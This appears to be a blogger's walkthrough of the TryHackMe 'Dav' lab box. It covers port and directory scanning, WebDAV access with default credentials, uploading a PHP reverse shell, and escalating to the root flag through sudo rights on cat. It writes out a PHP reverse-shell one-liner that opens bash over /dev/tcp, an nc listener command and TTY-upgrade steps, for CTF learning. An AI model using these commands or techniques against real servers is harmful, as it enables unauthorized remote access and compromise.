Heyo let's walk it out with yours truly Bobloblaw. This will be a walkthrough of TryHackMe's Dav:
Scanning & Enumeration
As always we start scanning the box with Mayor's Threader3000 which is then fed into an nmap scan:
If you were only to do the nmap scan you can see the syntax from above is:
nmap -T4 -Pn -p80 -A 10.10.232.204
Enumerating Services
The only open port for this box is a web server so let's explore that!
Port 80- http
Visiting the IP address it's just a default apache page with nothing interesting in the source code, so let's enumerate the directories:
I use dirsearch to do this:
dirsearch -x 404,403 -e * -r -u 10.10.232.204
We find some interesting directories when we do this, and visiting `webdav` we see that we need to supply some credentials.
With some brief research on webdav default credentials we find a wonderful link that gives us the default credentials, and with that we have access!
Vulnerable WebApp
Now that we have credentials, if we actually read the link I showed earlier a bit closer, we see that, once authenticated, we can log in to the webdav directory and may have the ability to upload files. Naturally, I'll try to upload a reverse shell to see if we can get onto the system!
Using cadaver, as shown in the above link, we have access to the system with our credentials:
Now to see if we can upload a reverse shell:
Success! The shell I like to use is this one liner:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/{ip}/{port} 0>&1'");
Awesome!
Getting User Flag
Now that we have uploaded our payload successfully, all we have left to do is catch it with a listener:
nc -nvlp 4444
Setting up my listener and then navigating to the webpage to run the uploaded file we gain a shell:
As always, I want a fully interactive shell and we do so like this:
python -c "import pty; pty.spawn('/bin/bash')"
ctrl + z
stty raw -echo
fg
fg
export TERM=xterm-256color
Breaking it down:
- The python command executed spawns an interactive bash shell
- We then background the shell we have with ctrl + z
- We then can set up autocomplete and the fully interactive shell with the echo command
- We then foreground the shell twice and we have our fully interactive shell
After executing these commands we have a fully interactive shell which has autocomplete and ctrl+c capabilities. Now let's see if we can get that flag:
Indeed we can!
Root Flag
One of the first things to always check when getting a foothold are your sudo rights. Doing this:
We see that we have sudo rights for `cat`, which is mighty convenient for a CTF. Taking advantage of this:
And we obtain the root flag!
That's all for now, thanks for reading! If there are any questions or feedback about anything I did, as always, you can reach me on the THM website or on their discord server under the name bobloblaw.
Comments